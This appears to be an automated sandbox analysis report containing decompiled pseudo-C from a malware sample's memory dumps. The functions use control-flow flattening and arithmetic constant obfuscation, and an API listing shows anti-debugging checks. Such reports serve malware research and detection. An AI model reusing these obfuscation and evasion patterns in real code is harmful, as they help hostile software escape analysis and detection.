                                                                                                                                  				_t266 = __edx;
                                                                                                                                  				_t237 = __ecx;
                                                                                                                                  				_t267 = 0x52ffaa2;
                                                                                                                                  				_t239 = 0xb;
                                                                                                                                  				_v28 = _v28 / _t239;
                                                                                                                                  				_v28 = _v28 ^ 0x00028e70;
                                                                                                                                  				_v32 = 0x2476b5;
                                                                                                                                  				_t240 = 0x6f;
                                                                                                                                  				_v32 = _v32 / _t240;
                                                                                                                                  				_v32 = _v32 ^ 0x0008b44d;
                                                                                                                                  				_v60 = 0x9e7d2d;
                                                                                                                                  				_v60 = _v60 >> 0xc;
                                                                                                                                  				_v60 = _v60 << 0xe;
                                                                                                                                  				_v60 = _v60 ^ 0x02752993;
                                                                                                                                  				_v24 = 0xe09194;
                                                                                                                                  				_t241 = 0x44;
                                                                                                                                  				_v24 = _v24 / _t241;
                                                                                                                                  				_v24 = _v24 ^ 0x0009703f;
                                                                                                                                  				_v96 = 0x854eb1;
                                                                                                                                  				_v96 = _v96 + 0xc1c6;
                                                                                                                                  				_v96 = _v96 * 0x1a;
                                                                                                                                  				_v96 = _v96 | 0x594c04b7;
                                                                                                                                  				_v96 = _v96 ^ 0x5dd9e9b5;
                                                                                                                                  				_v20 = 0x86d30b;
                                                                                                                                  				_v20 = _v20 | 0xe45dff90;
                                                                                                                                  				_v20 = _v20 ^ 0xe4d4624e;
                                                                                                                                  				_v92 = 0x8501b9;
                                                                                                                                  				_v92 = _v92 >> 6;
                                                                                                                                  				_v92 = _v92 * 0x2f;
                                                                                                                                  				_v92 = _v92 + 0xe9ed;
                                                                                                                                  				_v92 = _v92 ^ 0x0060653e;
                                                                                                                                  				_v52 = 0xaa921f;
                                                                                                                                  				_v52 = _v52 ^ 0x3dfd2146;
                                                                                                                                  				_v52 = _v52 >> 1;
                                                                                                                                  				_v52 = _v52 ^ 0x1ea8ab64;
                                                                                                                                  				_v56 = 0x2765e6;
                                                                                                                                  				_v56 = _v56 ^ 0x5c8ea534;
                                                                                                                                  				_v56 = _v56 | 0xccee86e2;
                                                                                                                                  				_v56 = _v56 ^ 0xdcebf872;
                                                                                                                                  				_v88 = 0x89b797;
                                                                                                                                  				_v88 = _v88 + 0x84ba;
                                                                                                                                  				_v88 = _v88 + 0xc14;
                                                                                                                                  				_v88 = _v88 | 0xbe23ba3f;
                                                                                                                                  				_v88 = _v88 ^ 0xbea6e118;
                                                                                                                                  				_v48 = 0x866a1d;
                                                                                                                                  				_v48 = _v48 >> 9;
                                                                                                                                  				_v48 = _v48 * 0x16;
                                                                                                                                  				_v48 = _v48 ^ 0x0007ec78;
                                                                                                                                  				_v16 = 0x7d5d8a;
                                                                                                                                  				_v16 = _v16 >> 8;
                                                                                                                                  				_v16 = _v16 ^ 0x000578c4;
                                                                                                                                  				_v68 = 0x2c77b1;
                                                                                                                                  				_v68 = _v68 | 0xad369f51;
                                                                                                                                  				_v68 = _v68 << 0xd;
                                                                                                                                  				_v68 = _v68 ^ 0xdff48475;
                                                                                                                                  				_v72 = 0x3ef83;
                                                                                                                                  				_v72 = _v72 << 3;
                                                                                                                                  				_v72 = _v72 + 0xb46;
                                                                                                                                  				_v72 = _v72 ^ 0x001ba742;
                                                                                                                                  				_v76 = 0x4a0f2c;
                                                                                                                                  				_t242 = 0x6a;
                                                                                                                                  				_v76 = _v76 * 0x54;
                                                                                                                                  				_v76 = _v76 << 0xa;
                                                                                                                                  				_v76 = _v76 ^ 0x33e29f20;
                                                                                                                                  				_v36 = 0x9fb368;
                                                                                                                                  				_v36 = _v36 >> 0xb;
                                                                                                                                  				_v36 = _v36 ^ 0x000f389a;
                                                                                                                                  				_v40 = 0x5cfe3a;
                                                                                                                                  				_v40 = _v40 + 0x27ff;
                                                                                                                                  				_v40 = _v40 ^ 0x005ee30c;
                                                                                                                                  				_v104 = 0xfd26ea;
                                                                                                                                  				_v104 = _v104 << 9;
                                                                                                                                  				_v104 = _v104 + 0xffff1095;
                                                                                                                                  				_v104 = _v104 + 0xffffd24c;
                                                                                                                                  				_v104 = _v104 ^ 0xfa4b2973;
                                                                                                                                  				_v80 = 0xbb493f;
                                                                                                                                  				_v80 = _v80 + 0x4ae2;
                                                                                                                                  				_v80 = _v80 | 0xbb4dbcb8;
                                                                                                                                  				_v80 = _v80 + 0x3bc7;
                                                                                                                                  				_v80 = _v80 ^ 0xbbf0b3fa;
                                                                                                                                  				_v44 = 0xfc3c2e;
                                                                                                                                  				_v44 = _v44 << 0x10;
                                                                                                                                  				_v44 = _v44 + 0xffff4208;
                                                                                                                                  				_v44 = _v44 ^ 0x3c281d99;
                                                                                                                                  				_v84 = 0xc50344;
                                                                                                                                  				_v84 = _v84 | 0xb9ed19f4;
                                                                                                                                  				_v84 = _v84 / _t242;
                                                                                                                                  				_t243 = 0x6b;
                                                                                                                                  				_v84 = _v84 / _t243;
                                                                                                                                  				_v84 = _v84 ^ 0x000f16db;
                                                                                                                                  				while(1) {
                                                                                                                                  					L1:
                                                                                                                                  					_t231 = 0xc3f018b;
                                                                                                                                  					do {
                                                                                                                                  						L2:
                                                                                                                                  						while(_t267 != 0x52ffaa2) {
                                                                                                                                  							if(_t267 == 0x865547f) {
                                                                                                                                  								_t243 = _v88;
                                                                                                                                  								_t232 = E002DCDAE(_v88, _v48, _v16,  *((intOrPtr*)(_t266 + 0x38)));
                                                                                                                                  								_t270 =  &(_t270[2]);
                                                                                                                                  								 *((intOrPtr*)(_t266 + 0x1c)) = _t232;
                                                                                                                                  								__eflags = _t232;
                                                                                                                                  								_t231 = 0xc3f018b;
                                                                                                                                  								_t267 =  !=  ? 0xc3f018b : 0xb7a2405;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							if(_t267 == 0xb133873) {
                                                                                                                                  								_push(_v32);
                                                                                                                                  								_t233 = E002EC3A0(_t237, _v64, __eflags, _v100, _v28, _t243);
                                                                                                                                  								_t271 =  &(_t270[4]);
                                                                                                                                  								 *((intOrPtr*)(_t266 + 0x38)) = _t233;
                                                                                                                                  								__eflags = _t233;
                                                                                                                                  								if(_t233 != 0) {
                                                                                                                                  									E002D7B8B( *((intOrPtr*)(_t266 + 0x38)), _v60,  *((intOrPtr*)(_t266 + 0x38)), _v24, _v96);
                                                                                                                                  									_push( *((intOrPtr*)(_t266 + 0x38)));
                                                                                                                                  									_push(_v56);
                                                                                                                                  									_push(_v52);
                                                                                                                                  									_t243 = _v20;
                                                                                                                                  									E002D7C37(_v20, _v92);
                                                                                                                                  									_t270 =  &(_t271[6]);
                                                                                                                                  									_t267 = 0x865547f;
                                                                                                                                  									goto L1;
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								if(_t267 == 0xb7a2405) {
                                                                                                                                  									return E002E9E56(_v80, _v44, _v84,  *((intOrPtr*)(_t266 + 0x38)));
                                                                                                                                  								}
                                                                                                                                  								if(_t267 != _t231) {
                                                                                                                                  									goto L13;
                                                                                                                                  								} else {
                                                                                                                                  									_t233 = E002D46BE(_t243, _v68, _t243, _v72, _t243, _v76, _v36, _v40, _t243, _t266, E002D4C5D, _v104);
                                                                                                                                  									_t270 =  &(_t270[0xa]);
                                                                                                                                  									 *((intOrPtr*)(_t266 + 0x2c)) = _t233;
                                                                                                                                  									if(_t233 == 0) {
                                                                                                                                  										_t267 = 0xb7a2405;
                                                                                                                                  										while(1) {
                                                                                                                                  											L1:
                                                                                                                                  											_t231 = 0xc3f018b;
                                                                                                                                  											goto L2;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							return _t233;
                                                                                                                                  						}
                                                                                                                                  						_t267 = 0xb133873;
                                                                                                                                  						L13:
                                                                                                                                  						__eflags = _t267 - 0x1aeb2e;
                                                                                                                                  					} while (__eflags != 0);
                                                                                                                                  					return _t231;
                                                                                                                                  				}
                                                                                                                                  			}
                                                                                                                                  0x002db84c
                                                                                                                                  0x002db854
                                                                                                                                  0x002db85c
                                                                                                                                  0x002db864
                                                                                                                                  0x002db86c
                                                                                                                                  0x002db874
                                                                                                                                  0x002db87e
                                                                                                                                  0x002db882
                                                                                                                                  0x002db88a
                                                                                                                                  0x002db892
                                                                                                                                  0x002db89a
                                                                                                                                  0x002db8a2
                                                                                                                                  0x002db8a6
                                                                                                                                  0x002db8ae
                                                                                                                                  0x002db8b6
                                                                                                                                  0x002db8be
                                                                                                                                  0x002db8c6
                                                                                                                                  0x002db8ce
                                                                                                                                  0x002db8d6
                                                                                                                                  0x002db8de
                                                                                                                                  0x002db8e6
                                                                                                                                  0x002db8ee
                                                                                                                                  0x002db8f6
                                                                                                                                  0x002db8fe
                                                                                                                                  0x002db908
                                                                                                                                  0x002db90c
                                                                                                                                  0x002db914
                                                                                                                                  0x002db91c
                                                                                                                                  0x002db923
                                                                                                                                  0x002db930
                                                                                                                                  0x002db938
                                                                                                                                  0x002db940
                                                                                                                                  0x002db945
                                                                                                                                  0x002db94d
                                                                                                                                  0x002db955
                                                                                                                                  0x002db95a
                                                                                                                                  0x002db962
                                                                                                                                  0x002db96a
                                                                                                                                  0x002db979
                                                                                                                                  0x002db97c
                                                                                                                                  0x002db980
                                                                                                                                  0x002db985
                                                                                                                                  0x002db98d
                                                                                                                                  0x002db995
                                                                                                                                  0x002db99a
                                                                                                                                  0x002db9a2
                                                                                                                                  0x002db9aa
                                                                                                                                  0x002db9b2
                                                                                                                                  0x002db9ba
                                                                                                                                  0x002db9c2
                                                                                                                                  0x002db9c7
                                                                                                                                  0x002db9cf
                                                                                                                                  0x002db9d7
                                                                                                                                  0x002db9df
                                                                                                                                  0x002db9e7
                                                                                                                                  0x002db9ef
                                                                                                                                  0x002db9f7
                                                                                                                                  0x002db9ff
                                                                                                                                  0x002dba07
                                                                                                                                  0x002dba0f
                                                                                                                                  0x002dba14
                                                                                                                                  0x002dba1c
                                                                                                                                  0x002dba24
                                                                                                                                  0x002dba2c
                                                                                                                                  0x002dba3c
                                                                                                                                  0x002dba44
                                                                                                                                  0x002dba47
                                                                                                                                  0x002dba4b
                                                                                                                                  0x002dba53
                                                                                                                                  0x002dba53
                                                                                                                                  0x002dba53
                                                                                                                                  0x002dba58
                                                                                                                                  0x00000000
                                                                                                                                  0x002dba58
                                                                                                                                  0x002dba6a
                                                                                                                                  0x002dbb2d
                                                                                                                                  0x002dbb31
                                                                                                                                  0x002dbb36
                                                                                                                                  0x002dbb39
                                                                                                                                  0x002dbb3c
                                                                                                                                  0x002dbb40
                                                                                                                                  0x002dbb45
                                                                                                                                  0x00000000
                                                                                                                                  0x002dbb45
                                                                                                                                  0x002dba76
                                                                                                                                  0x002dbac0
                                                                                                                                  0x002dbad3
                                                                                                                                  0x002dbad8
                                                                                                                                  0x002dbadb
                                                                                                                                  0x002dbade
                                                                                                                                  0x002dbae0
                                                                                                                                  0x002dbaf8
                                                                                                                                  0x002dbafd
                                                                                                                                  0x002dbb00
                                                                                                                                  0x002dbb04
                                                                                                                                  0x002dbb0c
                                                                                                                                  0x002dbb10
                                                                                                                                  0x002dbb15
                                                                                                                                  0x002dbb18
                                                                                                                                  0x00000000
                                                                                                                                  0x002dbb18
                                                                                                                                  0x002dba78
                                                                                                                                  0x002dba7a
                                                                                                                                  0x00000000
                                                                                                                                  0x002dbb75
                                                                                                                                  0x002dba82
                                                                                                                                  0x00000000
                                                                                                                                  0x002dba88
                                                                                                                                  0x002dbaa9
                                                                                                                                  0x002dbaae
                                                                                                                                  0x002dbab1
                                                                                                                                  0x002dbab6
                                                                                                                                  0x002dbabc
                                                                                                                                  0x002dba53
                                                                                                                                  0x002dba53
                                                                                                                                  0x002dba53
                                                                                                                                  0x00000000
                                                                                                                                  0x002dba53
                                                                                                                                  0x002dba53
                                                                                                                                  0x002dbab6
                                                                                                                                  0x002dba82
                                                                                                                                  0x002dbb7d
                                                                                                                                  0x002dbb7d
                                                                                                                                  0x002dbb4d
                                                                                                                                  0x002dbb52
                                                                                                                                  0x002dbb52
                                                                                                                                  0x002dbb52
                                                                                                                                  0x00000000
                                                                                                                                  0x002dba58

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !)$2+l$>e`$?p$J$e'
                                                                                                                                  • API String ID: 0-1675410552
                                                                                                                                  • Opcode ID: fadffdc5591e0e9458c210e0235ea609e3becd43873a798e6ba19247d4405ef4
                                                                                                                                  • Instruction ID: 78dd43d0c613db8db91dfc786cc9e410fe3ba4116f71ce5c314990c9080640bb
                                                                                                                                  • Opcode Fuzzy Hash: fadffdc5591e0e9458c210e0235ea609e3becd43873a798e6ba19247d4405ef4
                                                                                                                                  • Instruction Fuzzy Hash: 4BB141724083819FC358CF65C58A40BFBE2FBC5748F108A1DF58A96260D3B5CA69CF86
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002DE5CF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                  				char _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				signed int _v84;
                                                                                                                                  				signed int _v88;
                                                                                                                                  				signed int _v92;
                                                                                                                                  				signed int _v96;
                                                                                                                                  				signed int _v100;
                                                                                                                                  				signed int _v104;
                                                                                                                                  				signed int _v108;
                                                                                                                                  				signed int _v112;
                                                                                                                                  				signed int _v116;
                                                                                                                                  				void* _t170;
                                                                                                                                  				void* _t181;
                                                                                                                                  				void* _t184;
                                                                                                                                  				void* _t189;
                                                                                                                                  				void* _t192;
                                                                                                                                  				void* _t195;
                                                                                                                                  				void* _t197;
                                                                                                                                  				void* _t220;
                                                                                                                                  				signed int _t221;
                                                                                                                                  				signed int _t222;
                                                                                                                                  				signed int _t223;
                                                                                                                                  				signed int* _t226;
                                                                                                                                  
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_t219 = _a4;
                                                                                                                                  				_t195 = __ecx;
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t170);
                                                                                                                                  				_v56 = 0xa4c651;
                                                                                                                                  				_t226 =  &(( &_v116)[4]);
                                                                                                                                  				_v56 = _v56 ^ 0x6a6d8bac;
                                                                                                                                  				_v56 = _v56 ^ 0x6ac6bd64;
                                                                                                                                  				_t220 = 0;
                                                                                                                                  				_v60 = 0xbac055;
                                                                                                                                  				_t197 = 0xf39239f;
                                                                                                                                  				_v60 = _v60 << 0xd;
                                                                                                                                  				_v60 = _v60 ^ 0x580542e6;
                                                                                                                                  				_v108 = 0xd580f5;
                                                                                                                                  				_v108 = _v108 ^ 0x97cdda0d;
                                                                                                                                  				_v108 = _v108 + 0x37dd;
                                                                                                                                  				_v108 = _v108 >> 0xe;
                                                                                                                                  				_v108 = _v108 ^ 0x00021113;
                                                                                                                                  				_v52 = 0xf28435;
                                                                                                                                  				_v52 = _v52 | 0x057a1a90;
                                                                                                                                  				_v52 = _v52 ^ 0x05fdc129;
                                                                                                                                  				_v80 = 0x5c8bc8;
                                                                                                                                  				_t221 = 0x27;
                                                                                                                                  				_v80 = _v80 / _t221;
                                                                                                                                  				_t222 = 0x1b;
                                                                                                                                  				_v80 = _v80 * 9;
                                                                                                                                  				_v80 = _v80 ^ 0x0013f028;
                                                                                                                                  				_v96 = 0x281d9a;
                                                                                                                                  				_v96 = _v96 + 0xffff8f77;
                                                                                                                                  				_v96 = _v96 + 0x4719;
                                                                                                                                  				_v96 = _v96 << 0xf;
                                                                                                                                  				_v96 = _v96 ^ 0xfa152b1c;
                                                                                                                                  				_v112 = 0x7415d8;
                                                                                                                                  				_v112 = _v112 >> 0xf;
                                                                                                                                  				_v112 = _v112 + 0xfffff76c;
                                                                                                                                  				_v112 = _v112 >> 0xd;
                                                                                                                                  				_v112 = _v112 ^ 0x000d779a;
                                                                                                                                  				_v88 = 0xb68707;
                                                                                                                                  				_v88 = _v88 ^ 0x45e0ecf4;
                                                                                                                                  				_v88 = _v88 + 0xffff71c0;
                                                                                                                                  				_v88 = _v88 ^ 0x455519c2;
                                                                                                                                  				_v116 = 0xceabf6;
                                                                                                                                  				_v116 = _v116 + 0x1225;
                                                                                                                                  				_v116 = _v116 / _t222;
                                                                                                                                  				_v116 = _v116 >> 6;
                                                                                                                                  				_v116 = _v116 ^ 0x0006e3bb;
                                                                                                                                  				_v84 = 0xd525a4;
                                                                                                                                  				_v84 = _v84 + 0xffff1243;
                                                                                                                                  				_v84 = _v84 + 0x1c30;
                                                                                                                                  				_v84 = _v84 ^ 0x00df7efc;
                                                                                                                                  				_v100 = 0xf29ecf;
                                                                                                                                  				_v100 = _v100 << 0xc;
                                                                                                                                  				_v100 = _v100 + 0xffff4e95;
                                                                                                                                  				_v100 = _v100 ^ 0x70d6065d;
                                                                                                                                  				_v100 = _v100 ^ 0x593d89f0;
                                                                                                                                  				_v104 = 0x2206c6;
                                                                                                                                  				_v104 = _v104 | 0x38687435;
                                                                                                                                  				_v104 = _v104 ^ 0xadcf411b;
                                                                                                                                  				_v104 = _v104 ^ 0x9549ac77;
                                                                                                                                  				_v104 = _v104 ^ 0x00e3f730;
                                                                                                                                  				_v92 = 0xd38a43;
                                                                                                                                  				_v92 = _v92 >> 3;
                                                                                                                                  				_v92 = _v92 + 0x6fd1;
                                                                                                                                  				_v92 = _v92 ^ 0x0012c73c;
                                                                                                                                  				_v64 = 0x625266;
                                                                                                                                  				_v64 = _v64 + 0x2436;
                                                                                                                                  				_v64 = _v64 ^ 0x006987c3;
                                                                                                                                  				_v68 = 0xe296bd;
                                                                                                                                  				_v68 = _v68 << 0xd;
                                                                                                                                  				_v68 = _v68 ^ 0x52d9a139;
                                                                                                                                  				_v72 = 0x54a2fd;
                                                                                                                                  				_v72 = _v72 << 0xd;
                                                                                                                                  				_v72 = _v72 >> 0xa;
                                                                                                                                  				_v72 = _v72 ^ 0x002b3e4c;
                                                                                                                                  				_v76 = 0x32cdcd;
                                                                                                                                  				_v76 = _v76 << 0xb;
                                                                                                                                  				_t223 = 0x32;
                                                                                                                                  				_v76 = _v76 / _t223;
                                                                                                                                  				_v76 = _v76 ^ 0x0302c408;
                                                                                                                                  				_v48 = 0x2d2164;
                                                                                                                                  				_v48 = _v48 + 0xfffff0e0;
                                                                                                                                  				_v48 = _v48 ^ 0x0021ab5a;
                                                                                                                                  				do {
                                                                                                                                  					while(_t197 != 0x2168849) {
                                                                                                                                  						if(_t197 == 0x29fa3de) {
                                                                                                                                  							_t184 = E002D2A21(_v84, _v100,  &_v44, _t219 + 0x20, _v104);
                                                                                                                                  							_t226 =  &(_t226[3]);
                                                                                                                                  							__eflags = _t184;
                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                  								_t197 = 0x74ac459;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							if(_t197 == 0x545de14) {
                                                                                                                                  								E002D3DBC( &_v44, _t195, _v56, _v60, _v108);
                                                                                                                                  								_t226 =  &(_t226[3]);
                                                                                                                                  								_t197 = 0x2168849;
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								if(_t197 == 0x6ab10c5) {
                                                                                                                                  									_t189 = E002D2A21(_v112, _v88,  &_v44, _t219 + 0x1c, _v116);
                                                                                                                                  									_t226 =  &(_t226[3]);
                                                                                                                                  									__eflags = _t189;
                                                                                                                                  									if(__eflags != 0) {
                                                                                                                                  										_t197 = 0x29fa3de;
                                                                                                                                  										continue;
                                                                                                                                  									}
                                                                                                                                  								} else {
                                                                                                                                  									if(_t197 == 0x74ac459) {
                                                                                                                                  										_t192 = E002D2A21(_v92, _v64,  &_v44, _t219 + 0x28, _v68);
                                                                                                                                  										_t226 =  &(_t226[3]);
                                                                                                                                  										__eflags = _t192;
                                                                                                                                  										if(__eflags != 0) {
                                                                                                                                  											_t197 = 0x9dbfb8a;
                                                                                                                                  											continue;
                                                                                                                                  										}
                                                                                                                                  									} else {
                                                                                                                                  										if(_t197 == 0x9dbfb8a) {
                                                                                                                                  											__eflags = E002ED97D( &_v44, _v72, __eflags, _v76, _t219 + 4, _v48);
                                                                                                                                  											_t220 =  !=  ? 1 : _t220;
                                                                                                                                  										} else {
                                                                                                                                  											if(_t197 != 0xf39239f) {
                                                                                                                                  												goto L19;
                                                                                                                                  											} else {
                                                                                                                                  												_t197 = 0x545de14;
                                                                                                                                  												continue;
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L22:
                                                                                                                                  						return _t220;
                                                                                                                                  					}
                                                                                                                                  					_t181 = E002D2A21(_v52, _v80,  &_v44, _t219 + 0x14, _v96);
                                                                                                                                  					_t226 =  &(_t226[3]);
                                                                                                                                  					__eflags = _t181;
                                                                                                                                  					if(__eflags == 0) {
                                                                                                                                  						_t197 = 0x90a774d;
                                                                                                                                  						goto L19;
                                                                                                                                  					} else {
                                                                                                                                  						_t197 = 0x6ab10c5;
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					goto L22;
                                                                                                                                  					L19:
                                                                                                                                  					__eflags = _t197 - 0x90a774d;
                                                                                                                                  				} while (__eflags != 0);
                                                                                                                                  				goto L22;
                                                                                                                                  			}

                                                                                                                                  0x002de849
                                                                                                                                  0x002de8e8
                                                                                                                                  0x002de8ed
                                                                                                                                  0x002de8f0
                                                                                                                                  0x00000000
                                                                                                                                  0x002de84f
                                                                                                                                  0x002de855
                                                                                                                                  0x002de8bf
                                                                                                                                  0x002de8c4
                                                                                                                                  0x002de8c7
                                                                                                                                  0x002de8c9
                                                                                                                                  0x002de8cf
                                                                                                                                  0x00000000
                                                                                                                                  0x002de8cf
                                                                                                                                  0x002de857
                                                                                                                                  0x002de85d
                                                                                                                                  0x002de893
                                                                                                                                  0x002de898
                                                                                                                                  0x002de89b
                                                                                                                                  0x002de89d
                                                                                                                                  0x002de8a3
                                                                                                                                  0x00000000
                                                                                                                                  0x002de8a3
                                                                                                                                  0x002de85f
                                                                                                                                  0x002de865
                                                                                                                                  0x002de982
                                                                                                                                  0x002de984
                                                                                                                                  0x002de86b
                                                                                                                                  0x002de871
                                                                                                                                  0x00000000
                                                                                                                                  0x002de877
                                                                                                                                  0x002de877
                                                                                                                                  0x00000000
                                                                                                                                  0x002de877
                                                                                                                                  0x002de871
                                                                                                                                  0x002de865
                                                                                                                                  0x002de85d
                                                                                                                                  0x002de855
                                                                                                                                  0x002de849
                                                                                                                                  0x002de988
                                                                                                                                  0x002de990
                                                                                                                                  0x002de990
                                                                                                                                  0x002de93a
                                                                                                                                  0x002de93f
                                                                                                                                  0x002de942
                                                                                                                                  0x002de944
                                                                                                                                  0x002de950
                                                                                                                                  0x00000000
                                                                                                                                  0x002de946
                                                                                                                                  0x002de946
                                                                                                                                  0x00000000
                                                                                                                                  0x002de946
                                                                                                                                  0x00000000
                                                                                                                                  0x002de955
                                                                                                                                  0x002de955
                                                                                                                                  0x002de955
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 5th8$6$$L>+$Mw$Mw$fRb
                                                                                                                                  • API String ID: 0-3812525031
                                                                                                                                  • Opcode ID: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
                                                                                                                                  • Instruction ID: 6a4706db6a14a280ceb77680b13ba94d96b37d48dda74c2c726460c19e03f473
                                                                                                                                  • Opcode Fuzzy Hash: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
                                                                                                                                  • Instruction Fuzzy Hash: 5C9174B2118342DBC794DE61C88945BFBE5FBD4758F108A1EF58296220D7B1CA29CF93
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 100357B5
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 100357CA
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(10049C70), ref: 100357D5
                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 100357F1
                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 100357F8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2579439406-0
                                                                                                                                  • Opcode ID: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
                                                                                                                                  • Instruction ID: 3237c6aacfb12be4d9d12df29f826ae8d0614ddfd4a103b53015e2b6a0b2c6c3
                                                                                                                                  • Opcode Fuzzy Hash: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
                                                                                                                                  • Instruction Fuzzy Hash: B021FFB4801320CFFB11DF68EDC56483BB4FB88315F50606AE90D87A71E7B16A80AF56
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                  			E002F0056() {
                                                                                                                                  				char _v520;
                                                                                                                                  				char _v1040;
                                                                                                                                  				char _v1560;
                                                                                                                                  				char _v1564;
                                                                                                                                  				signed int _v1568;
                                                                                                                                  				signed int _v1572;
                                                                                                                                  				signed int _v1576;
                                                                                                                                  				signed int _v1580;
                                                                                                                                  				signed int _v1584;
                                                                                                                                  				signed int _v1588;
                                                                                                                                  				signed int _v1592;
                                                                                                                                  				signed int _v1596;
                                                                                                                                  				signed int _v1600;
                                                                                                                                  				signed int _v1604;
                                                                                                                                  				signed int _v1608;
                                                                                                                                  				signed int _v1612;
                                                                                                                                  				signed int _v1616;
                                                                                                                                  				signed int _v1620;
                                                                                                                                  				signed int _v1624;
                                                                                                                                  				signed int _v1628;
                                                                                                                                  				signed int _v1632;
                                                                                                                                  				signed int _v1636;
                                                                                                                                  				signed int _v1640;
                                                                                                                                  				signed int _v1644;
                                                                                                                                  				signed int _v1648;
                                                                                                                                  				signed int _v1652;
                                                                                                                                  				unsigned int _v1656;
                                                                                                                                  				signed int _v1660;
                                                                                                                                  				signed int _v1664;
                                                                                                                                  				signed int _v1668;
                                                                                                                                  				signed int _v1672;
                                                                                                                                  				signed int _v1676;
                                                                                                                                  				signed int _v1680;
                                                                                                                                  				signed int _v1684;
                                                                                                                                  				signed int _v1688;
                                                                                                                                  				signed int _v1692;
                                                                                                                                  				signed int _v1696;
                                                                                                                                  				signed int _v1700;
                                                                                                                                  				signed int _v1704;
                                                                                                                                  				signed int _v1708;
                                                                                                                                  				signed int _v1712;
                                                                                                                                  				signed int _v1716;
                                                                                                                                  				signed int _v1720;
                                                                                                                                  				signed int _v1724;
                                                                                                                                  				signed int _v1728;
                                                                                                                                  				signed int _v1732;
                                                                                                                                  				signed int _v1736;
                                                                                                                                  				signed int _v1740;
                                                                                                                                  				signed int _v1744;
                                                                                                                                  				signed int _v1748;
                                                                                                                                  				void* _t500;
                                                                                                                                  				void* _t502;
                                                                                                                                  				intOrPtr* _t509;
                                                                                                                                  				void* _t513;
                                                                                                                                  				signed int _t522;
                                                                                                                                  				intOrPtr _t523;
                                                                                                                                  				intOrPtr* _t524;
                                                                                                                                  				signed int _t525;
                                                                                                                                  				signed int _t526;
                                                                                                                                  				signed int _t527;
                                                                                                                                  				signed int _t528;
